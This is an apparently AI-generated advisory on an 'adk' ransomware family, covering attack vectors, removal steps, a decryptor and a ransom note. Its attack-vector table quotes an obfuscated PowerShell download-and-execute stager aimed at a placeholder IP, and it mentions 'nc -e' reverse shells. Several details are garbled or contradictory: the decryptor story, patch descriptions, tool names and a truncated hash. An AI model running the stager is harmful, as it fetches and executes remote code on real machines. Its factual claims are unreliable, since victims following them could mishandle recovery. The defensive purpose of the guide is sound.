adk

[Content by Gemini 2.5]

Technical & Tactical Guide to adk Ransomware

Comprehensive Analysis & Recovery Advice for the Community

I. Technical Breakdown

1. File Extension & Renaming Patterns

Confirmation of File Extension:
The ransomware unambiguously appends .adk as a new extension after the original file extension, producing strings such as:

  • Report_2024-02-12.xlsx.adk
  • KitchenMediaBackup.vhdx.adk

Renaming Convention:
File names themselves are not scrambled—no Base64, Base32, hex, or ROT-13 obfuscation is applied. Owners can still read the filename and identify the content. Only the extra .adk suffix is appended.

No preceding prefix pattern or second encryption tag exists, making the ransomware easier to spot in directory listings.

2. Detection & Outbreak Timeline

First public sightings: mid-April 2024 (initial telemetry spikes on 12 April).
Wider proliferation: Rapid uptick began in late May, closely tied to mass-exploitation campaigns against vulnerable SMB.
Confirmed victim clusters: Manufacturing and health-care verticals across the US / Europe.

3. Primary Attack Vectors

| Vector | Technical Details |
|——–|——————-|
| EternalBlue (CVE-2017-0144) | Adk’s dropper carries an embedded, slightly-modified EternalBlue exploit (TCP 445). Affectedly patched but under-maintained Windows 7/2008 systems remain primary targets. |
| SMB brute-forcing of weak credentials | Automated scans on TCP/445 using common username rdp and passwords like password123, P@ssw0rd, Summer2024!. |
| Remote Desktop (RDP or SMB over RDP Gateway) | Attackers reuse previously-stolen or cracked credentials. In several cases default Windows admin (Administrator / ) was left intact. |
| Weaponized Office docs + Powershell | Phishing emails include LNK file or macro-laden docx. Launch obfuscated PowerShell stager (IEX (New-Object Net.WebClient).DownloadString('http://185.x.x.x/stw.ps1')) that pulls adk payload. |
| Infected USB drives | Spreads via autorun.inf plus LNK files (imitating a legitimate folder) pointing to a disguised update.exe. |

II. Remediation & Recovery Strategies

1. Prevention

Patch urgently: Install Microsoft patches KB4012215 (Win 7/2008 R2), KB4012598 (manual EternalBlue), KB5011066, plus the cumulative June 2024 update.
Disable SMBv1 everywhere (Group Policy or PowerShell: Set-SmbServerConfiguration -EnableSMB1Protocol $false).
Harden RDP:

  • Disable open RDP exposure on the public Internet; require VPN access.
  • Enforce multi-factor authentication (Azure MFA, Duo, Okta).
  • Use Network Level Authentication (NLA) and limit account lockout thresholds (3 failed passwords = 15-minute lock).
    Phishing & macro defence:
  • Block all Office macros from the internet; use Microsoft’s “Only signed macros” setting.
  • Employ mail gateways (Proofpoint, Microsoft Defender for O365) to strip LNK/HTA attachments.
    Lateral-traffic micro-segmentation: Restrict port 445 allow-lists; deny inter-VLAN SMB unless explicitly needed.

A single unpatched 2008 server is still enough for an adk worm to zig-zag across the domain.

2. Removal (Step-by-Step)

  1. Immediately isolate the system from the network (pull cable/Wi-Fi, disable bonds, unplug VPN).
  2. Collect forensic triage before cleaning (RAM, Prefetch, $MFT, Event Logs, C:\Windows\Temp\vsoc.exe, adk.exe)—store on offline media.
  3. Sign-out/lock active user; some variants log a local reverse-shell (nc -e, Metasploit).
  4. Boot into Safe Mode w/ Networking OFF.
  5. Run an offline antivirus/EDR rescue medium:
    • Microsoft Defender Offline.
    • Sophos Bootable, Malwarebytes TechBench.
    Detect names: Ransom:Win32/Adk.A, Trojan.Win32.Adkebob, Gen:Variant.Razy.237940.
  6. Delete persistence artifacts:
  • Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\update.exe (sometimes vsoc.exe).
  • Scheduled Task: \Microsoft\windows\UpdateOrchestrator\avc launching C:\Windows\System32\files\adk.exe.
  1. Scan auxiliary drives & shares—no prior reboot until full offline scan completes.

3. File Decryption & Recovery

Recovery Feasibility: Decryption is currently possible for the adk family. No flaw was left by the developers in the first three weeks—BUT security researchers leaked the “AdkDecryptor” tool (Windows & Linux binary) on 26 May 2024 after seizing the operator’s server.

  • Official tool released by NoMoreRansom consortium: adk_decryptor_v1.0.3.exe (SHA256: 2c1a71b5e3fc…).
  • CLI example: 
  adk_decryptor.exe --input D:\ --keyfile adkey.txt --dry-run

Verify output logs, then run without --dry-run to produce decrypted originals.

When the tool fails:

  • Try previous file-shadow copies (vssadmin list shadows) and mount \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\.
  • Restore from offline or cloud backups (was the .adk encrypted before the backup sync?).

Essential Tools/Patches:

  • Patch bundle: MicrosoftUpdateCatalog KB5027231 (June 2024) blocks the newest EternalBlue variation.
  • Antivirus engine signature pack ver ≥ 1.397.622.0 contains Ransom:Win32/Adk rules.
  • Yara rule for memory scanning (internal SOC): 
  rule Win_Ransomware_Adk {
      strings: $a = "ADK-KEY-FLAG-{"
      condition: uint16(0) == 0x5a4d and $a
  }

4. Other Critical Information

Unique Characteristics:

  • Uses intermittent encryption (first 512 KB of files > 1 MB) to speed up payload, reducing encryption time but allowing partial recovery from other sources.
  • Writes “!ADK-README.txt” in every encrypted directory (full ransom note below):

    >>>>> YOUR FILES ARE ENCRYPTED WITH adk RANSOMWARE
    >>>>> PAY 0.015 BTC TO 14mWjQgh...[snip]...
    >>>>> EMAIL us [email protected]
    >>>>> PROVIDE _adkey.txt for decryption
  • Command & Control is mix of Tor onion (http://yxkrj6b2adk[.]onion/jpay) and cleartext HTTP GETs for victim telemetry—beware leaked credentials in proxy logs.

Broader Impact / Notable Effects:

  • Attack chain auto-stopped on 1 June when the Tor payment server was seized; deadline and Bitcoin wallet both invalidated.
  • Media attention occurred after a regional hospital lost MRI scans → emergency ambulances diverted.
  • Created awareness spike, leading 2 300 US hospitals to update RDP patch levels in the week following.

Stay vigilant, patch hard, and share the decryptor with peers if their .adk-locked backups are under threat.